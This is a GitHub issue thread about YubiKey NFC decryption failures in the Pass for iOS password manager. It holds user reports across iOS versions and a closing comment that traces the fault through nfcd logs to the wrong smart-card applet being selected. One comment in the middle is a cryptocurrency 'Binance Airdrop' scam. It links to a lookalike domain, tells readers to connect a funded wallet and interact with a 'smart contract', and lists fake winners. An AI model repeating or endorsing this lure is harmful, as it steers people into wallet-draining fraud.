### ISSUE TITLE
using yubikey throws error

### ISSUE THREAD

**Issue by startbit96** [mssun/passforios#629]
Hi, when I try to use my YubiKey 5C NFC with this app (version 0.14.0) I cannot decrypt my passwords. In the settings I set the PGP Key only to YubuKey (it then states "Not Set + YubiKey").
Every time when I try to decrypt I get one of these two messages and afterwards the app crashes.

Error 1:
#Error Domain=com.yubico Code =25985 "Status error 0x6581 returned by the key."

Error 2:
#Error Domain=NFCError Code=102 "Tag response error / no response" UserInfo={NSLocalizedDescription=Tag response error / no response, NSUnderlyingError=0×283371dd0 {Error Domain=nfcd Code=29 "Tag Error" UserInfo=INSLocalizedDescription=Tag Error, NSUnderlyingError=0×283373210 {Error Domain=com.apple.nfstack Code=20 "No response from tag" UserInfo={NSLocalizedDescription=No response from tag}}}}}#

On general, the app detects the YubiKey since I get an error message when I enter the wrong pin and the app does also not crash in this case. But when I enter the right pin one of the two errors above occur and the app crashes. Has anybody had the same issue?

**Comment by Kernald** [comment]
Same issue here on iOS 17.1.

**Comment by JehTeh** [comment]
I just migrated from Android to iOS (17.1) and am seeing the same issue - but only on some of my passwords, most decrypt fine.

**Comment by ak1394** [comment]
I'm on iOS 17.1.1 with YubiKey 5 NFC, I don't have this issue.

**Comment by Kernald** [comment]
Still have the issue on 17.1.1, on an iPhone 15 Pro.

**Comment by dannyob** [comment]
Yep, I have this problem too. iOS 17.1, iphone 15 Pro Max iOS 17.2, Pass v. 0.14.0, YubiKey 5 NFC
Firmware version: 5.4.3

**Comment by dannyob** [comment]
Actually, it worked after a reboot(!)

**Comment by dannyob** [comment]
...and then stopped working in the same way. Sigh!

**Comment by crawfordlong** [comment]
iOS 17.2.1 on an iPhone 15 Pro. I'm not sure what the specific error is (happy to provide logs if you can tell me where they are), but the app is either not collecting my Yubikey pin correctly or is not validating it correctly. The Yubikey is definitely registering the attempt as a failed one, as I have had to unlock the key twice testing this. The Yubikey doesn't seem to work at all when plugged into the phone's USB-C port.

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @HEDPAY, @MaximilianLloyd, @yayoc, @Willian-Zhang, @florenciasilva, @alc0r, @fredliang44

**Comment by l0u1sg** [comment]
Same issue on iOS 17.3 on an iPhone 11

**Comment by codebam** [comment]
Same issue on iOS 17.5 Beta 4

**Comment by dannyob** [comment]
This is working a lot better since #663  -- I still get the occasional "Failed to decipher data", but this may just be the connection between the Yubikey and the iPhone? Thank you @mssun !

**Comment by codebam** [comment]
I'm still encountering "Failed to decipher data" error after the update.

```
iOS 18.3 Beta
iPhone 13 Pro Max
```

**Comment by slackline** [comment]
Also encountering the `Failed to decipher data` error.

```
iOS 18.3.2
iPhone 12
```

Keys were imported via QR codes and I'm prompted to enter the Yubikey password and then present the NFC key at which point I'm told `Failed to decipher data`. 🤷

**Comment by clumbo** [comment]
Exactly the same how can we get this sorted out properly it seems to be an ongoing issue

**Comment by davvore33** [comment]
Same issue here. Device: iPhone 15, iOS 26.6.2. Key: YubiKey 5 NFC, OpenPGP applet firmware 3.4 (`gpg --card-status` reports `Application ID: D2760001240100000006238364760000`).

I captured the unified log from the device via USB (`pymobiledevice3 syslog live`) while reproducing the failure, and the `nfcd` trace shows what looks like the actual root cause — not just "Failed to decipher data" but *why*:

```
11:33:15.513  -[_NFSession didStartSession:] Pass (15482) started _NFReaderSession-...
11:33:22.367  -[_NFReaderSession _processRawTagsForCoreNFC:...] tag: Tech=A Type=Generic SAK=20 ATQA=4400 ...
11:33:22.367  -[NFDriverWrapper(Tag) connectTag:updatedTag:] Connecting to tag...
11:33:22.742  -[_NFReaderSession _findAppFromSet:tag:foundApp:outError:] Found app: A000000527471117
11:33:23.686  -[_NFSession _internalEndSessionWithDequeue:completion:]_block_invoke Pass (15482) ended _NFReaderSession-...
11:33:23.782  [libnfshared.dylib] ERROR: +[NFTLV _parseTLVs:end:simple:definite:] Failed to recurse children of constructed (?) tag 0xf1, returning as simple
11:33:23.783  [libnfshared.dylib] ERROR: +[NFTLV _parseTLVs:end:simple:definite:] Failed to recurse children of constructed (?) tag 0xa0, returning as simple
11:33:26.345  -[_NFReaderSession activateUIControllerWithCompletion:]_block_invoke Activating invalidation handler: error=0x3 for session
```

`A000000527471117` is **not** the OpenPGP applet AID (which is `D276000124010304...`, RID `D2760001`) — it's the **YubiKey Management Application** AID (RID `A0000005 27`, confirmed against Yubico's own [yubikit-ios NFC-Notes.md](https://github.com/Yubico/yubikit-ios/blob/main/docs/NFC-Notes.md)). So the reader session is selecting the wrong applet on the key before attempting the decrypt operation, gets back a response whose TLV structure the OpenPGP-oriented parsing code doesn't expect (hence the two `NFTLV` errors), and the session tears down with `error=0x3` right after.

This was still happening after #663 for me too, so whatever applet-selection logic is choosing among the AIDs the reader session is configured to look for, it seems to be picking the Management applet instead of (or before) the OpenPGP one on this key/firmware combo. Happy to grab a fuller log capture or test a patch if useful — just didn't want to lose this trace since none of the earlier reports here included the underlying `nfcd` error.
